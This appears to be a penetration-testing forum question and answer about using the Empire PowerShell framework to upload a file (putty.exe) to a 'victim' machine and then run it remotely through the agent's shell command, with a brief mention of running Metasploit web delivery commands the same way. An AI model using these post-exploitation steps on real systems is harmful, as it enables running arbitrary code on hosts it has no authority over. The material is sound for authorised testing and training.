# Empire testing powershell commands

Tags: penetration-test, powershell

I am testing Empire Powershell.

I was wondering how you can remotely execute a file after you upload it to the victim's machine?

```
(Empire: ANHGP22NCFLPVAAH) > cd Desktop
(Empire: ANHGP22NCFLPVAAH) > 
Path                   
----                   
C:\Users\Testpc\Desktop
(Empire: ANHGP22NCFLPVAAH) > upload /root/Testpc/putty.exe
(Empire: ANHGP22NCFLPVAAH) > cd Desktop
(Empire: ANHGP22NCFLPVAAH) > 
Path                   
----                   
C:\Users\Testpc\Desktop
(Empire: ANHGP22NCFLPVAAH) > dir
(Empire: ANHGP22NCFLPVAAH) > 
LastWriteTime      Length Name                                       
-------------      ------ ----                                       
11-1-2017 23:27:49    282 desktop.ini                                
20-2-2017 0:50:37  531368 putty.exe 
(Empire: ANHGP22NCFLPVAAH) > (what are the commands to remotly execute the putty.exe file)
```

Comment: Run shell putty.exe

Comment: Okay I will run a test,let you know if it works.

Answer (score 1):

You can use the `shell` command.

From the help screen:

> shell: Task an agent to use a shell command.

In your case, running putty.exe would be like so:

```
(Empire: Win10Priv) > shell <pathtoputty>\putty.exe
```

You can also do this to execute Metasploit web delivery commands, sort of a simpler way if migrating from Empire to Msf.